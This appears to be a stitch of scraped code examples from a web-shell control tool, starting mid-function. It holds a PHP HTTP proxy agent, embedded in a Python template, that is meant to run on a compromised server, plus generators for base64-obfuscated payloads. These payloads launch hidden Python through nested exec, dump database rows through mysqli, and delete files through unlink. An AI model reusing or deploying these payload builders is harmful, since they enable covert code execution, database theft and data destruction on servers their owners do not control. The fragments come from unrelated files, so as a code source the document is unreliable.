                                $redirect_url = $this->get_host($this->request_url).$redirect_url;
                            }else{
                                $redirect_url = $this->request_url_group['scheme'].'://'.$this->request_url_group['host']. ':' . (isset($this->request_url_group['port']) ? $this->request_url_group['port'] : '80').(isset($this->request_url_group['path'])?($this->request_url_group['path'] == '/'?'/':substr($this->request_url_group['path'],0,strripos($this->request_url_group['path'],'/') + 1)):'/').$redirect_url;
                            }
                        }
                        $this->current_url = $redirect_url;
                        return $this->redirect_auto ? $this->get302_socket($redirect_url) : $body;
                    } else {
                        return $body;
                    }
                }
            }
        } catch (Exception $e) {
            die("SOCKET_error #:" . $e);
        }
    }

    public function getContent_fg(){
        try{

            if(in_array($this->request_method,$this->request_allowed_method)){
                if($this->request_method === 'POST'){
                    $type = "application/x-www-form-urlencoded";
                }
            }

            $opts = array(
                'http'=>array(
                    'method' => $this->request_method,
                    'content' => $this->get_query($this->request_data),
                    'timeout' => $this->timeout,
                    'header' => 'Content-Type: '.(isset($type)?'':$type)."\\r\\n".
                                'Content-Length: '.strlen($this->get_query($this->request_data))."\\r\\n".
                                ($this->request_cookie ? 'Cookie: ' . $this->request_cookie . "\\r\\n" : '')
                )
            );
            $context = stream_context_create($opts);
            $body = @file_get_contents($this->request_url.'?'.$this->get_query($this->request_params),false,$context);
            $result = $http_response_header;
            $this->header_data = $result;

            preg_match("#HTTP/[0-9\.]+\s+([0-9]+)#", $result[0], $code);
            if (300 <= $code[1] and $code[1] < 400) {
                $redirect_url = $this->get_redirect($result);
                $cookie = $this->redirect_cookie_use ? ($this->get_cookie($result) ? $this->get_cookie($result) : $this->request_cookie) : '';
                if($this->redirect_cookie_use and $cookie  != ''){
                            $this->request_cookie = $cookie;
                        }
                        if(stripos($redirect_url,'http://') == false){
                            if($redirect_url[0] == '/'){
                                $redirect_url = $this->get_host($this->request_url).$redirect_url;
                            }else{
                                $redirect_url = $this->request_url_group['scheme'].'://'.$this->request_url_group['host']. ':' . (isset($this->request_url_group['port']) ? $this->request_url_group['port'] : '80').(isset($this->request_url_group['path'])?($this->request_url_group['path'] == '/'?'/':substr($this->request_url_group['path'],0,strripos($this->request_url_group['path'],'/') + 1)):'/').$redirect_url;
                            }
                        }
                        $this->current_url = $redirect_url;
                        return $this->redirect_auto ? $this->get302_fg($redirect_url) : ($body===false?"Can't fetch contents```":$body);
            }else{
                return $body === false ? "Can't fetch contents```" : $body;
            }
        } catch(Exception $e){
            die("File_Get_Contents_error #:" . $e);
        }
    }
    public function getContent_c(){
        try{
            if(in_array($this->request_method,$this->request_allowed_method)){
                $curl = curl_init();

                curl_setopt($curl,CURLOPT_URL,$this->request_url.'?'.$this->get_query($this->request_params));
                curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
                curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,$this->timeout);
                curl_setopt($curl,CURLOPT_HEADER,true);

                if($this->request_cookie){
                    curl_setopt($curl,CURLOPT_COOKIE,$this->request_cookie);
                }

                if (in_array($this->request_method, $this->request_allowed_method)) {
                    if($this->request_method === 'POST'){
                        curl_setopt($curl,CURLOPT_POST,1);
                        curl_setopt($curl,CURLOPT_POSTFIELDS,$this->get_query($this->request_data));
                    }
                }
                $result = curl_exec($curl);
                if($result){
                    $header_size = curl_getinfo($curl,CURLINFO_HEADER_SIZE);
                    $header = explode("\\r\\n",substr($result,0,$header_size));
                    $body = substr($result,$header_size);
                    $status_code = intval(curl_getinfo($curl,CURLINFO_HTTP_CODE));
                    $this->header_data = $header;

                    curl_close($curl);

                    if(300 <= $status_code and $status_code < 400){
                        $redirect_url = $this->get_redirect($header);
                        $cookie = $this->redirect_cookie_use ? ($this->get_cookie($header) ? $this->get_cookie($header) : $this->request_cookie) : '';
                        if($this->redirect_cookie_use and $cookie  != ''){
                            $this->request_cookie = $cookie;
                        }
                        if(stripos($redirect_url,'http://') == false){
                            if($redirect_url[0] == '/'){
                                $redirect_url = $this->get_host($this->request_url).$redirect_url;
                            }else{
                                $redirect_url = $this->request_url_group['scheme'].'://'.$this->request_url_group['host']. ':' . (isset($this->request_url_group['port']) ? $this->request_url_group['port'] : '80').(isset($this->request_url_group['path'])?($this->request_url_group['path'] == '/'?'/':substr($this->request_url_group['path'],0,strripos($this->request_url_group['path'],'/') + 1)):'/').$redirect_url;
                            }
                        }
                        $this->current_url = $redirect_url;
                        return $this->redirect_auto ? $this->get302_c($redirect_url) : $body;
                    }else{
                        return $body;
                    }
                }
            }

        } catch (Exception $e) {
            die("CURL_error #:" . $e);
        }
    }

    public function get_content(){
        $contents = @file_get_contents($this->request_url);
        return $contents === false ? "Can't fetch contents```" : $contents;
    }

    public function __construct($request_url,$request_method,$request_redirect_method,$redirect_auto,$redirect_cookie_use,$params,$data,$cookie,$timeout,$type){
        $this->request_url = $request_url;
        $this->request_url_group = $this->url_cut($request_url);
        $this->current_url = $request_url;
        $this->request_method = $request_method;
        $this->request_redirect_method = $request_redirect_method;
        $this->redirect_auto = $redirect_auto;
        $this->redirect_cookie_use = $redirect_cookie_use;
        $this->request_params = $this->get_params($params);
        $this->request_data = $this->get_params($data);
        $this->request_cookie = $cookie;
        $this->request_allowed_method = ['GET','POST'];
        $this->timeout = $timeout;
        $this->type = $type;
    }

    public function __toString(){

        switch($this->type){
            case 1:
                $this->page_content = $this->get_element($this->request_url,$this->getContent_sock());
                break;
            case 2:
                $this->page_content = $this->get_element($this->request_url, $this->getContent_fg());
                break;
            case 3:
                $this->page_content = $this->get_element($this->request_url, $this->getContent_c());
                break;
            case 4:
                $this->page_content = $this->get_content();
                break;
        }

        return $this->page_content;
    }
}

$this_request = new Agent($REQUEST_URL,$REQUEST_METHOD,$REQUEST_REDIRECT_METHOD,$REDIRECT_AUTO,$REDIRECT_COOKIE_USE,$REQUEST_PARAMS,$REQUEST_DATA,$REQUEST_COOKIE,$TIMEOUT,$TYPE);

echo $this_request;
""" % (request_target, request_method, request_redirect_method, request_data,
       request_params, request_cookie, redirect_auto, redirect_cookie_use,
       timeout, type))
Exemplo n.º 15
def oneline_python(code: str):
    """Wrap ``code`` in a single ``python -c`` command line.

    The source travels base64-encoded inside the command string; the
    launched interpreter decodes it with ``base64.b64decode`` and runs it
    through two nested ``exec`` calls. For log review, the command line a
    process-creation record would show therefore has the fixed shape
    ``python -c "exec(...b64decode('<base64>'...)..."``.

    Args:
        code: Python source to embed.

    Returns:
        The command line as a string.
    """
    encoded_source = base64_encode(code)
    launcher = '''python -c "exec(\\"exec(__import__('base64').b64decode('%s'.encode()).decode())\\")"'''
    return launcher % encoded_source
Exemplo n.º 16
def get_php(command, database):
    """Return PHP source that runs one mysqli query and echoes the rows.

    The connection preamble comes from ``get_connect_code(dbname=database)``
    and the query text is embedded base64-encoded, to be decoded by the PHP
    side right before ``$con->query()``. The emitted output is one header
    line of column names followed by one line per row, every field
    terminated by ``*,``.

    Args:
        command: Query text to embed (base64-encoded before embedding).
        database: Database name forwarded to ``get_connect_code``.

    Returns:
        The PHP source as a string.
    """
    template = """%s
$r=$con->query(base64_decode('%s'));
$rows=$r->fetch_all(MYSQLI_ASSOC);
foreach($rows[0] as $k=>$v){
    echo "$k*,";
}
echo "\\n";
foreach($rows as $array){foreach($array as $k=>$v){echo "$v*,";};echo "\\n";}"""
    preamble = get_connect_code(dbname=database)
    encoded_query = base64_encode(command)
    return template % (preamble, encoded_query)
Exemplo n.º 17
def get_filesize_php(web_file_path: str):
    """Return PHP source that echoes ``filesize()`` of the given path.

    Args:
        web_file_path: Path to measure; embedded base64-encoded.

    Returns:
        The PHP source as a string, ending with a newline.
    """
    encoded_path = base64_encode(web_file_path)
    template = """echo filesize(base64_decode("%s"));
"""
    return template % (encoded_path)
Exemplo n.º 18
def get_php(web_file_path):
    """Return PHP source that unlinks one path and echoes 'success' if it worked.

    Args:
        web_file_path: Path to delete; embedded base64-encoded.

    Returns:
        The PHP source as a string.
    """
    encoded_path = base64_encode(web_file_path)
    template = """if(unlink(base64_decode("%s"))){echo 'success';}"""
    return template % encoded_path